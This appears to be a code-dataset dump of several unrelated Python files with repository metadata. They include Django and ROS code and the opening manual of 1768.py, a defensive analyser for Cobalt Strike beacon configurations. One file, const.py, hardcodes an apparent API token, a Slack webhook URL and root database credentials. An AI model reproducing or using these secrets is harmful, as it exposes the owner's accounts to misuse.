core.set_user(user_factory())
addon = addon_factory(
type=amo.ADDON_STATICTHEME, version_kw={'version': '1.0'})
old_version = addon.current_version
old_file_path = old_version.all_files[0].current_file_path
amo.storage_utils.copy_stored_file(self.file_obj_dep, old_file_path)
assert os.path.isfile(old_file_path)
new_version = new_theme_version_with_69_properties(old_version)
assert addon.versions.all().count() == 2
assert addon.current_version == new_version
new_file_path = new_version.all_files[0].current_file_path
with zipfile.ZipFile(self.file_obj_dep, 'r') as old_xpi:
with zipfile.ZipFile(new_file_path, 'r') as new_xpi:
assert len(old_xpi.infolist()) == len(new_xpi.infolist())
for entry in old_xpi.infolist():
file_ = entry.filename
if file_ == 'manifest.json':
old_manifest = json.loads(old_xpi.read(file_))
new_manifest = json.loads(new_xpi.read(file_))
assert old_manifest != new_manifest
# need to pop the version as it's been bumped
old_ver_num = old_manifest.pop('version')
new_ver_num = new_manifest.pop('version')
assert old_ver_num != new_ver_num
assert new_manifest == (
new_69_theme_properties_from_old(old_manifest))
else:
assert old_xpi.read(file_) == new_xpi.read(file_)
| [
"noreply@github.com"
] | sayantanu-dey.noreply@github.com |
b492a44bd15acf4605998bd0e646112469d741ec | e0a4e4d0014182dd58f53f9252191f72ebd94084 | /update_db/new_update/const.py | e4df0569c582de4434f1855931ab9fde6597cfa5 | [] | no_license | pinchukovartur/YandexAnalyticsServer | 8360b7000393cfac3d02e71768f0d853e8a3506a | 78c4afe5f08ecbb5ea18ffad1f2cfa1574cccaaf | refs/heads/master | 2021-05-15T00:57:31.753597 | 2018-08-06T15:09:39 | 2018-08-06T15:09:39 | 100,603,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | # STATIC DATA
# download config
TOKEN = "AQAAAAATpP0XAAR70vxUpgjrAkq_h3IGIcgKL-0"
TIME_SLEEP = 10
COUNT_PACK = 1000
# database config
SERVER_HOST = "http://localhost:8080"
DB_USER = "root"
DB_PASSWORD = "root"
DB_NAME = "analytics"
DB_HOST = "localhost"
MAX_SIZE_QUERY = 35000  # maximum query size (in characters)
# slack config
SLACK_URL = "https://hooks.slack.com/services/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"
SLACK_CHANEL = "#yandexanalytics"
SLACK_USERNAME = "Update YandexAnalytics"
SLACK_ICON = ":smile:"
| [
"pinchukovartur@outlook.com"
] | pinchukovartur@outlook.com |
b3445673b598b5fd351054d4e8e1370058ddf81f | 32dd66da6d17ae012e9ce205bd45798fd0862f0f | /migrations/0003_userip_users.py | 349c188dcc917b7e9d093e36186b4f52faf8c29c | [] | no_license | Tsvetov/analys_users | 58f570cab7e8246bfcf32ad8d7f25aac164bdca0 | 29ac4cc04fc7fa2bd02cba5c61dbc3a024f17eed | refs/heads/master | 2016-09-06T05:38:03.450472 | 2015-08-19T13:03:55 | 2015-08-19T13:03:55 | 40,681,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('analys_users', '0002_auto_20150818_2011'),
]
operations = [
migrations.AddField(
model_name='userip',
name='users',
field=models.ManyToManyField(related_name='users_rel_+', to='analys_users.UserIP'),
),
]
| [
"cpn@cpn"
] | cpn@cpn |
916633a8a378f22eba66ea03cf4b89c43d1d1acb | 47d8ab3d656af1ca4dd2b82dc355df4b54745e67 | /install/lib/python2.7/dist-packages/game_engine/msg/_WallInfoArray.py | 1348924954000f23b3b752c8847a9f2aa1a45e29 | [] | no_license | sergiodmlteixeira/pitank_sim_ai | cbc4edbda53b6904dbfc3c462095cac608d52a52 | 06aa31de7a5a69a85f249a2310aa97f7205362ce | refs/heads/master | 2020-09-10T07:16:33.740922 | 2019-11-14T11:32:48 | 2019-11-14T11:32:48 | 221,682,160 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,023 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from game_engine/WallInfoArray.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import game_engine.msg
class WallInfoArray(genpy.Message):
_md5sum = "00bbbcfc52895902500308e3cbae4262"
_type = "game_engine/WallInfoArray"
_has_header = False #flag to mark the presence of a Header object
_full_text = """WallInfo[] wall
================================================================================
MSG: game_engine/WallInfo
int8 id
int8 cluster
int16 x1
int16 x2
int16 y1
int16 y2
float64 xc
float64 yc
int8 life
bool vertical
"""
__slots__ = ['wall']
_slot_types = ['game_engine/WallInfo[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
wall
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(WallInfoArray, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.wall is None:
self.wall = []
else:
self.wall = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
length = len(self.wall)
buff.write(_struct_I.pack(length))
for val1 in self.wall:
_x = val1
buff.write(_get_struct_2b4h2dbB().pack(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.wall is None:
self.wall = None
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.wall = []
for i in range(0, length):
val1 = game_engine.msg.WallInfo()
_x = val1
start = end
end += 28
(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical,) = _get_struct_2b4h2dbB().unpack(str[start:end])
val1.vertical = bool(val1.vertical)
self.wall.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
length = len(self.wall)
buff.write(_struct_I.pack(length))
for val1 in self.wall:
_x = val1
buff.write(_get_struct_2b4h2dbB().pack(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.wall is None:
self.wall = None
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.wall = []
for i in range(0, length):
val1 = game_engine.msg.WallInfo()
_x = val1
start = end
end += 28
(_x.id, _x.cluster, _x.x1, _x.x2, _x.y1, _x.y2, _x.xc, _x.yc, _x.life, _x.vertical,) = _get_struct_2b4h2dbB().unpack(str[start:end])
val1.vertical = bool(val1.vertical)
self.wall.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2b4h2dbB = None
def _get_struct_2b4h2dbB():
global _struct_2b4h2dbB
if _struct_2b4h2dbB is None:
_struct_2b4h2dbB = struct.Struct("<2b4h2dbB")
return _struct_2b4h2dbB
| [
"up201402940@fe.up.pt"
] | up201402940@fe.up.pt |
a0083b784729d64bac8af1aa1606136939c50a4c | 22f5453db8a5727bde81e98cb7b6dadf92ebed59 | /scripts/lib/xpedite/extractor.py | 259166be45f7b9d814e41b2483cb132570031da3 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | kelliott55/Xpedite | 36f1493b7b2d6e53f3551f5bbbc3f6e2acdad5ff | 0be0ab07ec81164e0a8088a1cc3a0d60fa1fed06 | refs/heads/master | 2020-03-22T04:19:47.313380 | 2018-07-02T03:38:15 | 2018-07-02T03:38:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,423 | py | """
Extractor to extract and collect xpedite samples data
This module is used to load counter data from xpedite binary sample files.
A decoder is used to open and extract timing and pmc data captured by
probes in the target application.
Each such decoded record is inturn used to construct a Counter object for
transaction building.
Author: Manikandan Dhamodharan, Morgan Stanley
"""
import os
import re
import time
import logging
import subprocess
from xpedite.types import Counter, DataSource
from xpedite.util import makeLogPath, mkdir
LOGGER = logging.getLogger(__name__)
class Extractor(object):
"""Parses sample files to load counters for the current profile session"""
moduleDirPath = os.path.dirname(os.path.abspath(__file__))
samplesLoader = '{}/../../bin/xpediteSamplesLoader'.format(moduleDirPath)
def __init__(self, counterFilter, buildPrefix=None):
"""
Constructs a new instance of extractor
:param counterFilter: Filter to exclude out compromised or unused counters
:type counterFilter: xpedite.filter.TrivialCounterFilter
"""
self.binaryReportFilePattern = re.compile(r'[^\d]*(\d+)-(\d+)-([0-9a-fA-F]+)\.data')
self.counterFilter = counterFilter
self.buildPrefix = buildPrefix
self.orphanedRecords = []
def gatherCounters(self, app, loader, inflate=True):
"""
Gathers time and pmu counters from sample files for the current profile session
:param app: Handle to the instance of the xpedite app
:type app: xpedite.profiler.environment.XpediteApp
:param loader: Loader to build transactions out of the counters
:type loader: xpedite.transactionLoader.ChaoticTransactionLoader
:param inflate: Flag to persist profile data in csv format (Default value = True)
"""
pattern = app.sampleFilePattern()
LOGGER.info('scanning for samples files matching - %s', pattern)
filePaths = app.gatherFiles(pattern)
dataSourcePath = None
dataSources = []
if inflate:
dataSourcePath = makeLogPath('{}/{}'.format(app.name, app.runId))
dataSources.append(DataSource(app.appInfoPath, dataSourcePath))
loader.beginCollection(dataSources)
for filePath in filePaths:
(threadId, tlsAddr) = self.extractThreadInfo(filePath)
if not threadId or not tlsAddr:
raise Exception('failed to extract thread info for file {}'.format(filePath))
LOGGER.info('loading counters for thread %s from file %s -> ', threadId, filePath)
iterBegin = begin = time.time()
loader.beginLoad(threadId, tlsAddr)
inflateFd = self.openInflateFile(dataSourcePath, threadId, tlsAddr) if inflate else None
extractor = subprocess.Popen([self.samplesLoader, filePath],
bufsize=2*1024*1024, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
recordCount = 0
while True:
record = extractor.stdout.readline()
if record.strip() == '':
if extractor.poll() is not None:
errmsg = extractor.stderr.read()
if errmsg:
raise Exception('failed to load {} - {}'.format(filePath, errmsg))
break
if inflateFd:
inflateFd.write(record)
if recordCount > 0:
self.loadCounter(threadId, loader, app.probes, record)
elapsed = time.time() - iterBegin
if elapsed >= 5:
LOGGER.completed('\n\tprocessed %d counters | ', recordCount-1)
iterBegin = time.time()
recordCount += 1
loader.endLoad()
if inflateFd:
inflateFd.close()
elapsed = time.time() - begin
self.logCounterFilterReport()
if self.orphanedRecords:
LOGGER.warn('detected mismatch in binary vs app info - %d counters ignored', len(self.orphanedRecords))
LOGGER.completed('%d records | %d txns loaded in %0.2f sec.', recordCount-1, loader.getCount(), elapsed)
if loader.isCompromised() or loader.getTransactionCount() <= 0:
LOGGER.warn(loader.report())
elif loader.isNotAccounted():
LOGGER.debug(loader.report())
loader.endCollection()
MIN_FIELD_COUNT = 2
INDEX_TSC = 0
INDEX_ADDR = 1
INDEX_DATA = 2
INDEX_PMC = 3
def loadCounter(self, threadId, loader, probes, record):
"""
Loads time and pmu counters from the given record
:param threadId: Id of thread collecting the samples
:param loader: loader to build transactions out of the counters
:param probes: Map of probes instrumented in target application
:param record: A sample record in csv format
"""
fields = record.split(',')
if len(fields) < self.MIN_FIELD_COUNT:
raise Exception('detected record with < {} fields - \nrecord: "{}"\n'.format(self.MIN_FIELD_COUNT, record))
addr = fields[self.INDEX_ADDR]
if addr not in probes:
self.orphanedRecords.append(record)
return None
data = fields[self.INDEX_DATA]
tsc = long(fields[self.INDEX_TSC], 16)
counter = Counter(threadId, probes[addr], data, tsc)
if len(fields) > self.MIN_FIELD_COUNT:
for pmc in fields[self.MIN_FIELD_COUNT+1:]:
counter.addPmc(long(pmc))
if self.counterFilter.canLoad(counter):
loader.loadCounter(counter)
return counter
@staticmethod
def openInflateFile(dataSourcePath, threadId, tlsAddr):
"""
Creates a new data source file for the given thread
:param dataSourcePath: Path of the data source directory
:param threadId: Id of thread collecting the samples
:param tlsAddr: Address of thread local storage of thread collecting the samples
"""
path = os.path.join(dataSourcePath, '{}-{}'.format(threadId, tlsAddr))
mkdir(path)
filePath = os.path.join(path, 'samples-0000.csv')
return open(filePath, 'w')
def extractThreadInfo(self, samplesFile):
"""
Extracts thread id/thread local storage address from name of the samples file
:param samplesFile: Name of the samples file
"""
match = self.binaryReportFilePattern.findall(samplesFile)
if match and len(match[0]) > 2:
return (match[0][1], match[0][2])
return (None, None)
def logCounterFilterReport(self):
"""Logs statistics on the number of filtered counters"""
report = self.counterFilter.report()
if report:
      if self.counterFilter.extraneousCounters > 0:
        LOGGER.error(report)
      else:
        LOGGER.warn(report)
self.counterFilter.reset()
| [
"Mani-D@users.noreply.github.com"
] | Mani-D@users.noreply.github.com |
450884b464f60b3e241efe035f78dab576018545 | 56aa30f949f9e66bce9b7351d72cf76a65e8cd33 | /config/urls.py | 486d4479c5a6cb420fffdd8d1f3b3df2f07eba70 | [
"MIT"
] | permissive | bfssi-forest-dussault/food_list_db | 5684677aa9df6cd30fd81ae4a16940af34b32190 | 76d2d56a9948f41cf67f5a1c6612c2726bd0b8b7 | refs/heads/master | 2022-12-11T22:38:49.250432 | 2020-09-10T20:17:10 | 2020-09-10T20:17:10 | 294,507,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,886 | py | from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import include, path
from django.views import defaults as default_views
from django.views.generic import TemplateView
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/", TemplateView.as_view(template_name="pages/about.html"), name="about"
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
# User management
path("users/", include("food_list_db.users.urls", namespace="users")),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# API URLS
urlpatterns += [
# API base url
path("api/", include("config.api_router")),
# DRF auth token
path("auth-token/", obtain_auth_token),
]
if settings.DEBUG:
    # This allows the error pages to be debugged during development: just visit
    # these urls in a browser to see what these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
| [
"forest.dussault@canada.ca"
] | forest.dussault@canada.ca |
c342af77f7076aebe55ba2cc939f06cccaabe9c9 | 137832600734c4a3a16966bbaba19d3540378f9a | /1768.py | d44ef2d1bd2a0adbdd61901b7614ced2cfa29e10 | [] | no_license | DidierStevens/DidierStevensSuite | e824354c80f5b7aae4dfb6e55f60178eb9ae208c | 8190354314d6f42c9ddc477a795029dc446176c5 | refs/heads/master | 2023-09-01T20:11:55.341694 | 2023-08-29T10:26:39 | 2023-08-29T10:26:39 | 35,275,445 | 1,670 | 554 | null | 2023-06-04T22:54:40 | 2015-05-08T11:21:00 | Python | UTF-8 | Python | false | false | 112,042 | py | #!/usr/bin/env python
from __future__ import print_function
__description__ = 'Analyze Cobalt Strike beacons'
__author__ = 'Didier Stevens'
__version__ = '0.0.19'
__date__ = '2023/04/27'
"""
Source code put in the public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2019/05/15: start
2019/05/18: continue
2019/05/25: continue
2019/12/06: continue
2019/12/07: continue
2019/12/17: continue
2020/02/03: 0.0.2 some changes for CS4: xor key is '.' in stead of 'i'
2020/10/11: 0.0.3 Python 3 fixes
2020/10/17: improve parsing
2020/10/18: updated some config identifiers: found https://github.com/JPCERTCC/aa-tools https://github.com/sysopfb/malware_decoders/tree/master/cs_beacon https://github.com/Sentinel-One/CobaltStrikeParser
2020/10/21: Python 3 fix in cBinaryFile
2020/10/28: refactoring
2020/10/29: man
2020/11/04: added xor chain decoding
2020/11/07: 0.0.4 updated shellcode analysis
2020/11/12: updated shellcode analysis
2020/11/16: added option -l
2020/11/17: continue
2020/11/29: added rule_shellcode_00_end
2021/02/13: 0.0.5 updated shellcode analysis (+ Python 3 fix); added XORChain analysis for PE sections; remove duplicate configs when dumping raw
2021/03/06: added option -c
2021/03/25: 0.0.6 fix for provided sample
2021/04/06: fix
2021/04/28: added option -J
2021/04/30: CS version guessing
2021/05/02: fix
2021/05/15: continue JSON output
2021/06/14: updated man with 1768.json info
2021/10/10: 0.0.8 1768.json improvements
2021/10/17: 0.0.9 added malleable instructions decoding
2021/11/01: refactoring instructions decoding
2021/11/05: 0.0.10 cOutput replacements
2021/11/07: added FinalTests
2021/11/14: added DNS fields
2021/11/17: added missing field names (ebook FINDING BEACONS IN THE DARK)
2021/12/12: 0.0.11 added 1768b.json support
2022/02/22: 0.0.12 added private key to 1768.json (provided by alexzorila); fix json output; pyzipper support
2022/04/15: 0.0.13 added option -H and IdentifyShellcode
2022/04/16: continue IdentifyShellcode
2022/05/20: 0.0.14 skipping 0x20 bytes
2022/07/31: 0.0.15 update class cAPIOptions
2022/08/17: added option --sanitycheck; refactored FinalTests
2022/08/20: 0.0.16 added output instructions to JSON output
2022/08/30: 0.0.17 added option -x
2023/04/02: updated man page
2023/04/03: 0.0.18 cleanup debugging
2023/04/27: 0.0.19 added LSFIF
Todo:
"""
import optparse
import sys
import os
import binascii
import random
import gzip
import collections
import glob
import textwrap
import re
import struct
import string
import math
import fnmatch
import json
import time
import hashlib
try:
import pyzipper as zipfile
except ImportError:
import zipfile
if sys.version_info[0] >= 3:
from io import BytesIO as DataIO
else:
from cStringIO import StringIO as DataIO
if sys.version_info[0] >= 3:
from io import StringIO
else:
from cStringIO import StringIO
try:
import pefile
import peutils
except ImportError:
print('Missing pefile and/or peutils Python module, please check if it is installed.')
sys.exit()
def PrintManual():
manual = r'''
Manual:
1768 Kelvin is the melting point of the metal cobalt.
This tool decrypts and dumps the configuration of Cobalt Strike Windows beacons (PE files), shellcode and memory dumps.
Use option -x to try all 256 xor keys for the configuration (not only 0x2e and 0x69).
Option -s (--select) can be used to select a particular configuration item (by decimal or hexadecimal number) for more information. For the moment, this option displays the complete item's data (hexadecimal in cleartext, encoded with 'i' (0x69) and encoded with '.' (0x2e)). These hexadecimal values can be used to create detection rules, like YARA rules.
Option -l (--licenseid) is used to generate YARA rules to detect a beacon or shellcode with the given license ID. The id can be provided as an integer or an hexadecimal value (prefixed by 0x).
More than one license id can be provided: separate them by commas (,).
Each license id can be previded by a name for the license is (use : as a separator).
Example : 1768.py -l ATP_1:12345678,pentester_2:87654321
Option -c (--csv) is used to output the config parameters in CSV format.
Option -J (--jsonoutput) is used to output the config parameters in JSON format.
Use option -H to display the hashes of the analyzed file.
Option -S (--sanitycheck) performs a sanity check on the extracted configuration, and ignores the extracted configuration when it does not pass a sanity check.
The sanity check checks for the presence of config values 1 and 7, and checks if their values are plausible:
1 -> known payload type
7 -> public key starts with 308
Option -V (--verbose) produces more output:
- verbosity for config values (like the private key for leaked keys)
- hex/ascii dump of found signatures
When a signature is found, the longest ASCII string in front of the signature (256 bytes span) is included, like this:
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x122f12d31 (LSFIF: b'!#ALF:Y2V:Elastic/HKTL_CobaltStrike_Beacon_4_2_Decrypt')
LSFIF is an abbreviation for Longest String Found In Front.
A JSON file with name 1768.json placed in the same directory as 1768.py will be used to enhance fields with information, like the license-id field.
It reads one or more files or stdin. This tool is very versatile when it comes to handling files, later full details will be provided.
This Python script was first developed with Python 2.7 and tested with Python 2.7 and 3.7, now it is developed with Python 3.9 and tested with Python 3.9.
As stated at the beginning of this manual, this tool is very versatile when it comes to handling files. This will be explained now.
This tool reads files in binary mode. It can read files from disk, from standard input (stdin) and from "generated" files via the command line.
It can also partially read files (this is done with the cut operator).
If no file arguments are provided to this tool, it will read data from standard input (stdin). This way, this tool can be used in a piped chain of commands, like this:
oledump.py -s 4 -d sample.doc.vir | tool.py
When one or more file arguments are provided to this tool, it will read the files and process the content.
How the files are read, depends on the type of file arguments that are provided. File arguments that start with character @ or # have special meaning, and will be explained later.
If a file argument does not start with @ or #, it is considered to be a file on disk and the content will be read from disk.
If the file is not a compressed file, the binary content of the file is read from disk for processing.
Compressed files are solely recognized based on their extension: .zip and .gz.
It uses built-in Python module zipfile, unless module pyzipper is installed. Module pyzipper adds AES support, and can be installed with pip (Python 3 only).
If a file argument with extension .gz is provided, the tool will decompress the gzip file in memory and process the decompressed content. No checks are made to ensure that the file with extension .gz is an actual gzip compressed file.
If a file argument with extension .zip is provided and it contains a single file, the tool will extract the file from the ZIP file in memory and process the decompressed content. No checks are made to ensure that the file with extension .zip is an actual ZIP compressed file.
Password protected ZIP files can be processed too. The tool uses password 'infected' (without quotes) as default password. A different password can be provided using option --password.
Example:
tool.py sample.zip
To prevent the tool from decompressing .zip or .gz files, but to process the compressed file itself, use option --noextraction.
File arguments that start with character @ ("here files"), are read as text files that contain file arguments (one per line) to be processed.
For example, we take a text file with filename list.txt and following content:
sample-1.bin
sample-5.bin
sample-7.bin
When using this file (list.txt) in the following command:
tool.py @list.txt
the tool will process the following files: sample-1.bin, sample-5.bin and sample-7.bin.
A single @ character as filename is a here file read from stdin.
Wildcards are supported too. The classic *, ? and [] wildcard characters are supported. For example, use the following command to process all .exe and .dll files in the Windows directory:
tool.py C:\Windows\*.exe C:\Windows\*.dll
To prevent the tool from processing file arguments with wildcard characters or special initial characters (@ and #) differently, but to process them as normal files, use option --literalfilenames.
The content of folders can be processed too: use option --recursedir and provide folder names as argument. Wildcards and here files (for folder names) can be used too.
File arguments that start with character # have special meaning. These are not processed as actual files on disk (except when option --literalfilenames is used), but as file arguments that specify how to "generate" the file content.
File arguments that start with #, #h#, #b# or #e# are used to "generate" the file content.
Arguments that start with #c# are not file arguments, but cut operators (explained later).
Arguments that start with #f# are not file arguments, but flags (explained later).
Generating the file content with a # file argument means that the file content is not read from disk, but generated in memory based on the characteristics provided via the file argument.
When a file argument starts with # (and not with #h#, #b#, #e# or #c#), all characters that follow the # character specify the content of the generated file.
For example, file argument #ABCDE specifies a file containing exactly 5 bytes: ASCII characters A, B, C, D and E.
Thus the following command:
tool.py #ABCDE
will make the tool process data with binary content ABCDE. #ABCDE is not an actual file written on disk, but it is a notational convention to provide data via the command line.
Since this notation can not be used to specify all possible byte values, hexadecimal encoding (#h#) and BASE64 encoding (#b#) notation is supported too.
For example, #h#4142434445 is an hexadecimal notation that generates data ABCDE. Hexadecimal notation allows the generation of non-printable characters for example, like NULL bytes: #h#00
File argument #b#QUJDREU= is another example, this time BASE64 notation, that generates data ABCDE.
File arguments that start with #e# are a notational convention to use expressions to generate data. An expression is a single function/string or the concatenation of several functions/strings (using character + as concatenation operator).
Strings can be characters enclosed by single quotes ('example') or hexadecimal strings prefixed by 0x (0xBEEF).
4 functions are available: random, loremipsum, repeat and chr.
Function random takes exactly one argument: an integer (with value 1 or more). Integers can be specified using decimal notation or hexadecimal notation (prefix 0x).
The random function generates a sequence of bytes with a random value (between 0 and 255), the argument specifies how many bytes need to be generated. Remark that the random number generator that is used is just the Python random number generator, not a cryptographic random number generator.
Example:
tool.py #e#random(100)
will make the tool process data consisting of a sequence of 100 random bytes.
Function loremipsum takes exactly one argument: an integer (with value 1 or more).
The loremipsum function generates "lorem ipsum" text (fake latin), the argument specifies the number of sentences to generate.
Example: #e#loremipsum(2) generates this text:
Ipsum commodo proin pulvinar hac vel nunc dignissim neque eget odio erat magna lorem urna cursus fusce facilisis porttitor congue eleifend taciti. Turpis duis suscipit facilisi tristique dictum praesent natoque sem mi egestas venenatis per dui sit sodales est condimentum habitasse ipsum phasellus non bibendum hendrerit.
Function chr takes one argument or two arguments.
chr with one argument takes an integer between 0 and 255, and generates a single byte with the value specified by the integer.
chr with two arguments takes two integers between 0 and 255, and generates a byte sequence with the values specified by the integers.
For example #e#chr(0x41,0x45) generates data ABCDE.
Function repeat takes two arguments: an integer (with value 1 or more) and a byte sequence. This byte sequence can be a quoted string of characters (single quotes), like 'ABCDE' or an hexadecimal string prefixed with 0x, like 0x4142434445.
The repeat function will create a sequence of bytes consisting of the provided byte sequence (the second argument) repeated as many times as specified by the first argument.
For example, #e#repeat(3, 'AB') generates byte sequence ABABAB.
When more than one function needs to be used, the byte sequences generated by the functions can be concatenated with the + operator.
For example, #e#repeat(10,0xFF)+random(100) will generate a byte sequence of 10 FF bytes followed by 100 random bytes.
The cut argument (or cut operator) allows for the partial selection of the content of a file. This argument starts with #c# followed by a "cut-expression". Use this expression to "cut out" part of the content.
The cut-argument must be put in front of a file argument, like in this example:
tool.py #c#0:100l data.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data.bin.
A cut argument is applied to all file arguments that follow it. Example:
tool.py #c#0:100l data-1.bin data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 100 bytes file data-2.bin.
More than one cut argument can be used, like in this example:
tool.py #c#0:100l data-1.bin #c#0:200l data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 200 bytes (0:200l) of file data-2.bin.
A cut-expression is composed of 2 terms separated by a colon (:), like this:
termA:termB
termA and termB can be:
- nothing (an empty string)
- a positive decimal number; example: 10
- an hexadecimal number (to be preceded by 0x); example: 0x10
- a case sensitive ASCII string to search for (surrounded by square brackets and single quotes); example: ['MZ']
- a case sensitive UNICODE string to search for (surrounded by square brackets and single quotes prefixed with u); example: [u'User']
- an hexadecimal string to search for (surrounded by square brackets); example: [d0cf11e0]
If termA is nothing, then the cut section of bytes starts with the byte at position 0.
If termA is a number, then the cut section of bytes starts with the byte at the position given by the number (first byte has index 0).
If termA is a string to search for, then the cut section of bytes starts with the byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
If termB is nothing, then the cut section of bytes ends with the last byte.
If termB is a number, then the cut section of bytes ends with the byte at the position given by the number (first byte has index 0).
When termB is a number, it can have suffix letter l. This indicates that the number is a length (number of bytes), and not a position.
termB can also be a negative number (decimal or hexadecimal): in that case the position is counted from the end of the file. For example, :-5 selects the complete file except the last 5 bytes.
If termB is a string to search for, then the cut section of bytes ends with the last byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
No checks are made to assure that the position specified by termA is lower than the position specified by termB. This is left up to the user.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance (a number equal to 1 or greater) to indicate which instance needs to be taken. For example, ['ABC']2 will search for the second instance of string 'ABC'. If this instance is not found, then nothing is selected.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an offset (+ or - a number) to add (or subtract) an offset to the found instance. This number can be a decimal or hexadecimal (prefix 0x) value. For example, ['ABC']+3 will search for the first instance of string 'ABC' and then select the bytes after ABC (+ 3).
Finally, search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance and an offset.
Examples:
This cut-expression can be used to dump the first 256 bytes of a PE file located inside the file content: ['MZ']:0x100l
This cut-expression can be used to dump the OLE file located inside the file content: [d0cf11e0]:
A flag argument starts with #f# and is passed on for all files that are provided after the flag argument. It can be used to change the behavior of the tool for certain files.
Example:
tool.py data-1.bin #f#-l data-2.bin
data-2.bin will be processed differently (using flag option -l) than file data-1.bin.
With option --jsoninput, the tool will parse the output produced by another tool using option --jsonoutput.
Example:
zipdump.py --jsonoutput Book1.xlsm | file-magic.py --jsoninput
[Content_Types].xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
_rels/.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/_rels/workbook.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/workbook.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/drawings/drawing1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/_rels/sheet1.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/theme/theme1.xml XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
xl/styles.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/sheet1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/vbaProject.bin Composite Document File V2 Document, Cannot read section info
xl/drawings/vmlDrawing1.vml ASCII text, with CRLF line terminators
docProps/app.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/ctrlProps/ctrlProp1.xml XML 1.0 document, ASCII text, with CRLF line terminators
docProps/core.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
In this example, zipdump is used to produce JSON data with the content of each file contained inside file Book1.xlsm (a ZIP container), which is then consumed by file-magic.py to identify (libmagic) the type of each file.
With option --ignoreprocessingerrors, the tool will continue processing the next file when an error occurs while processing the current file. Files that can not be opened will always be skipped to move to the next file.
